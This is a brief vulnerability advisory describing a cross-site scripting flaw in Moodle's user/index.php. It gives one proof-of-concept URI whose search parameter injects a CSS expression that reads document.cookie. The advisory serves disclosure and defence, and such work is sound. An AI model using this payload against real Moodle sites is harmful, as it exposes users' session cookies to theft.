Moodle Index.PHP Cross Site Scripting Vulnerability

Moodle Index.PHP Cross Site Scripting Vulnerability

To exploit this issue, an attacker must entice an unsuspecting victim into following a malicious URI.

The following proof-of-concept URI is available:

http://www.example.com/user/index.php?contextid=4&roleid=0&id=2&group=&perpage=20&search=%22style=xss:expression(alert(document.cookie))%20